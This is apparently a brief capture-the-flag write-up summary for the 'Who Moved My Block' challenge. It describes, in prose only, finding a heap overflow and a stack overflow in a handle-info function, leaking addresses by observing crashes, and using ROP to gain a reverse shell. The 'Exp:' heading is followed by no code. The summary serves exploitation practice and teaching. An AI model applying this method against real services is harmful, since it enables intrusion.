The solution is similar to CVE-2018-1160, Metatalk in Hitcon 2021.

1.Read the source code and find the vulnerability.

2.I find two vulnerabilities one Heap-Overflow and one Stack-Overflowin function handle-info

3.The heap-overflow is hard to use, cuz we need to construct the heap Fengshui carefully.

4.While the Stack-Overflow one is easy to use, we could get the addresses of pie/heap/canary by judging the statement of connection (crash or hang).

5.ROP to get a reversed shell Exp:

Original writeup (https://r3kapig.com/writeup/20220125-rwctf4/#who-moved-my-block).